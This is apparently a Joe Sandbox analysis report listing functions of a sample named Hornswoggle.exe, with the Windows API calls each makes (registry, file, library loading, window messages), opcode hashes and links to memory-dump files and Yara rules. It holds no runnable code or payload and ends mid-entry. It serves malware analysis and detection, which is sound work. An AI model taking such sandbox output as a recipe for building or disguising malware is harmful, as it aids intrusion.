API String ID: 3850602802-0
Opcode ID: 6f3fd260d9a20665192313664cef065be83871c58b0681ff97f62226ed226405
Instruction ID: 8ec6bfb8ef4f3ff43576048fe9568e939b5e998f238dec90285f5c94a9fc96e2
Opcode Fuzzy Hash: 6f3fd260d9a20665192313664cef065be83871c58b0681ff97f62226ed226405
Instruction Fuzzy Hash: 2201F431B24210ABE7294B389E04B6A36A8F710314F11823BF911F66F1D7B8DC029B4D

Function 00402308 Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C

RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 00402327
RegCloseKey.ADVAPI32(00000000), ref: 00402330

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID: CloseDeleteOpenValue
String ID:
API String ID: 849931509-0
Opcode ID: 640ef84aaa5a4d1c7ae329859e4cea83c356e8d6a4fc0d45da6cfdbf294ae742
Instruction ID: 87e18c8b9cd74d0bde17796df308dc93964f3544418e05dee947639aacfbea4d
Opcode Fuzzy Hash: 640ef84aaa5a4d1c7ae329859e4cea83c356e8d6a4fc0d45da6cfdbf294ae742
Instruction Fuzzy Hash: 4CF04473A00110AFDB10BFA48A4EAAE76799B50345F14443BF201B61C1D9BD4D12866D

Function 0040514E Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 0040515E

Part of subcall function 00404094: SendMessageA.USER32(0001043C,00000000,00000000,00000000), ref: 004040A6

CoUninitialize.COMBASE(00000404,00000000), ref: 004051AA

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID: InitializeMessageSendUninitialize
String ID:
API String ID: 2896919175-0
Opcode ID: a1e759c3ba7025077e10085eb26d18bfe45318352d138b018d477bc6a8fcf70b
Instruction ID: 484cf87bc9531c098fcd3877696a47d73f7080a50005c66256059c60e8f5965f
Opcode Fuzzy Hash: a1e759c3ba7025077e10085eb26d18bfe45318352d138b018d477bc6a8fcf70b
Instruction Fuzzy Hash: FAF0F0F6A04201BAEA611B549804B1A72B0DBC4702F80813AFF04B62A1923D58428A1D

Function 00401567 Relevance: 3.0, APIs: 2, Instructions: 23COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00010448), ref: 00401579
ShowWindow.USER32(00010442), ref: 0040158E

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 34ff18edd3c11d242e04e6dc0ee5230189bfa76ca485cef8dfffd048b0cc2ec8
Instruction ID: 7aa5c4f7886e8cba7d13c86f28d42bb7597e194b119905c56f16c38da31e44a6
Opcode Fuzzy Hash: 34ff18edd3c11d242e04e6dc0ee5230189bfa76ca485cef8dfffd048b0cc2ec8
Instruction Fuzzy Hash: 49E04F76B10104ABDB14DBA4EE8086E77A6E794310360453BD202B3694C2B49D459A68

Function 004061FC Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,?,00403295,00000009), ref: 0040620E
GetProcAddress.KERNEL32(00000000,?), ref: 00406229

Part of subcall function 0040618E: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004061A5
Part of subcall function 0040618E: wsprintfA.USER32 ref: 004061DE
Part of subcall function 0040618E: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004061F2

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 2c630675a567476a72db336401282eceef6d354bbdda173821c126d7c14613da
Instruction ID: 835994d0d4e2d07c36af23a3dc0c9bac066575a7a99d708227b603b56203bf9f
Opcode Fuzzy Hash: 2c630675a567476a72db336401282eceef6d354bbdda173821c126d7c14613da
Instruction Fuzzy Hash: 7EE08632A04111BAD650B6745D0496B73AC9B84740302487EF906F2185E7389C3196AA

Function 00405AD6 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000003,00402CF9,C:\Users\user\Desktop\Hornswoggle.exe,80000000,00000003), ref: 00405ADA
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405AFC

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 4a69860c6089f1fb7fd455c1891d9cc54c05e48a968a67635bcc5e625bd0c43f
Instruction ID: 2e597581bf20324382b204af2e2b9293bc3b27f4d9e8cb915424ec39c2be7a6e
Opcode Fuzzy Hash: 4a69860c6089f1fb7fd455c1891d9cc54c05e48a968a67635bcc5e625bd0c43f
Instruction Fuzzy Hash: A7D09E31658201EFFF098F20DD16F2EBBA2EB84B00F10962CBA92941E0D6755815DB26

Function 00405AB1 Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(?,?,004056C9,?,?,00000000,004058AC,?,?,?,?), ref: 00405AB6
SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405ACA

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 123b2631ce2b274a689f6f42d71c67174a47df8962c272e460887a4e83ced065
Instruction ID: a7f0a3a241a8181cef173a1dc0fd71ceb180899bf82cabeb0f5c2b47daa9e471
Opcode Fuzzy Hash: 123b2631ce2b274a689f6f42d71c67174a47df8962c272e460887a4e83ced065
Instruction Fuzzy Hash: 0AD0C972908121AFC2102728AD0C89BBB65EB54271B118B31FDAAA22B0D7304C528AA5

Function 004055BF Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNELBASE(?,00000000,0040321E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341B), ref: 004055C5
GetLastError.KERNEL32 ref: 004055D3

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
Instruction ID: ee333ff4e59061917a1f290c3015eab559b7a368ac9c9957fcbd809aee07952f
Opcode Fuzzy Hash: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
Instruction Fuzzy Hash: 04C08C31618102EBDB200B30CE08B073E61AB00381F208831A006F10E4CA349000C93F

Function 00402283 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 004022BC

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 4656573f168c310efd594f08e96abc660716981113b3fc3e41d9438b56e455a3
Instruction ID: ed5e863b5af70a22674a87f6432e4eb84017b1e79b4e81bbc09640d5f5368664
Opcode Fuzzy Hash: 4656573f168c310efd594f08e96abc660716981113b3fc3e41d9438b56e455a3
Instruction Fuzzy Hash: 8AE04F31B001746FDB217AF14E8EE7F11989B84348B64417EF601B62C3DDBC4D434AA9

Function 00402B44 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: ed1d997f1767e4ebe1524a955060e6e59f62574de8c72c2eb948d7caa6f8d669
Instruction ID: 806e3b40af95552ac91145e5354a2e2caa18036cb762c00ee55acc3717e10e35
Opcode Fuzzy Hash: ed1d997f1767e4ebe1524a955060e6e59f62574de8c72c2eb948d7caa6f8d669
Instruction Fuzzy Hash: D3E04FB6240108AFDB00EFA4DD46FA537ECE714701F008021B608D6091C674E5108B69

Function 00405B4E Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00409130,00000000,00000000,00000000,00000000,004128D8,0040A8D8,004031E0,00409130,00409130,004030E4,004128D8,00004000,?,00000000,00402F8E), ref: 00405B62

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: ffd4dfc917ffc97e7d907f9c2c90699c203f3b0ebfd4578ed28d6b2a376640fe
Instruction ID: c996f9a7b3ae33303237a126fc5a394e9691c2321a0fe14ef9137570749964f2
Opcode Fuzzy Hash: ffd4dfc917ffc97e7d907f9c2c90699c203f3b0ebfd4578ed28d6b2a376640fe
Instruction Fuzzy Hash: EAE08C3221465EABCF109E509C00EEB3B6CEB00360F008432FD24E2090D230F8209BA4

Function 00405B7D Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00409130,00000000,00000000,00000000,00000000,0040F673,0040A8D8,00403164,0040A8D8,0040F673,004128D8,00004000,?,00000000,00402F8E,00000004), ref: 00405B91

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
Instruction ID: 30ff8eedcc03066b87caa2a29a7ef1e7350fb4aaf77a02d24525aee886acae2a
Opcode Fuzzy Hash: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
Instruction Fuzzy Hash: 19E0EC3261425AEFEF609E659C00AEB7B7CFB05360F008432F925E6190D635F9219BA5

Function 00404094 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(0001043C,00000000,00000000,00000000), ref: 004040A6

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 50a7dacb6371fe0cd67611078dbaf3ccf85a23f01bbb2752a0812b92d5b89748
Instruction ID: add50700843ac817ab7d6e51381e723622021bba1cfe7f2961aa6f321ae6f442
Opcode Fuzzy Hash: 50a7dacb6371fe0cd67611078dbaf3ccf85a23f01bbb2752a0812b92d5b89748
Instruction Fuzzy Hash: 1CC04C71744201BAEA319B509D49F0777986750700F6644257320B60D1C6B4E410E62D

Function 0040407D Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000028,?,00000001,00403EAE), ref: 0040408B

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 3d364c0f7cae05b6249e8bcc12743ca4c2e9a63f4273028bf1a1c1708aea3851
Instruction ID: a78b9239c319e9cb66b61a8ea9955aebbc10e43728856a3b978814f56e37e297
Opcode Fuzzy Hash: 3d364c0f7cae05b6249e8bcc12743ca4c2e9a63f4273028bf1a1c1708aea3851
Instruction Fuzzy Hash: 19B092B6684200BAEE228B00DD09F457AB2E7A8742F008024B200240B0CAB200A1DB19

Function 004031E3 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EE1,?), ref: 004031F1

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
